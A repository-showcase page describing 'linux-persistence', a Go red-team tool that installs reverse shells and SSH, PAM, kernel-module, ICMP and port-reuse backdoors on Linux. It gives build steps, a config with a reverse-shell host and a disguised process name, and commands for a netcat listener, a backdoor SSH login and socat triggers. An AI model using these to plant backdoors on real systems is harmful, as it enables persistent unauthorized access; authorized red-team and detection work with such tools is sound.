linux-persistence: A Go-based Linux Persistence Tool for Security Research
Summary
linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.
Repository Info
Tags
Click on any tag to explore related repositories
Introduction
linux-persistence is a robust Linux persistence tool, meticulously crafted in Go. It provides a comprehensive suite of techniques designed to maintain unauthorized access on Linux systems. This tool is intended solely for authorized security research, penetration testing, red team exercises, and security awareness training. Users are strongly advised to adhere to ethical guidelines and local laws, as misuse can lead to severe consequences.
The repository showcases a wide array of persistence methods, including reverse shells, SSH backdoors, hidden files, cron backdoors, Setuid backdoors, PAM backdoors, kernel module backdoors, ICMP backdoors, DNS backdoors, VIM backdoors, Strace backdoors, and port reuse backdoors. Each technique offers a unique approach to achieving and maintaining system access.
Installation
To get linux-persistence up and running, you'll need to compile it from source. Ensure you have the necessary dependencies installed on your Linux system, including a GCC compiler, Linux kernel development headers, PAM development library, iptables, and netcat or socat.
First, clone the repository:
git clone https://github.com/Maikefee/linux-persistence.git
cd linux-persistence
Then, compile the tool:
go build -o linux-persistence main.go
Examples
For optimal results, it is recommended to run linux-persistence with root privileges.
Basic Usage:
sudo ./linux-persistence
Configuration Options:
You can customize various settings by modifying the config struct in main.go before compilation:
var config = Config{
ReverseShellHost: "192.168.1.100", // Reverse shell target host
ReverseShellPort: 4444, // Reverse shell target port
BackdoorPort: 6666, // VIM backdoor listening port
HiddenProcess: "systemd-resolved", // Hidden process name
SSHBackdoorPort: 2222, // SSH backdoor port
}
Using the Reverse Shell:
- Prepare Listener: On your attacker machine, start a netcat listener:
nc -lvp 4444 - Run Tool: On the target machine, execute the tool (it will attempt to connect to the configured
ReverseShellHost:ReverseShellPort):sudo ./linux-persistence
Using the SSH Backdoor:
After running the tool on the target, you can connect via SSH:
ssh -p 2222 root@target_ip
Port Reuse:
Activate port reuse by sending a specific string:
echo 'backdoor' | socat - tcp:target_ip:80
Deactivate port reuse:
echo 'close' | socat - tcp:target_ip:80
ICMP Backdoor:
The ICMP backdoor is triggered by sending an ICMP packet containing the string "backdoor".
Why Use linux-persistence?
linux-persistence stands out as a valuable resource for anyone involved in offensive security, security research, or defensive training. Its implementation in Go ensures efficiency and a relatively small footprint. The tool's strength lies in its comprehensive collection of diverse persistence techniques, offering practical insights into how adversaries maintain access on Linux systems.
For security professionals, it serves as an excellent educational platform to understand, simulate, and ultimately develop robust detection and protection strategies against various persistence mechanisms. The README also provides valuable information on detection methods (e.g., netstat -an, ps aux, crontab -l, lsmod) and protection recommendations (e.g., regular integrity checks, HIDS/NIDS deployment, restricting root privileges), making it useful for both red and blue teams.
Links
- GitHub Repository: https://github.com/Maikefee/linux-persistence
- Blog Post URL: https://osrepos.jalab.pt/repo/maikefee-linux-persistence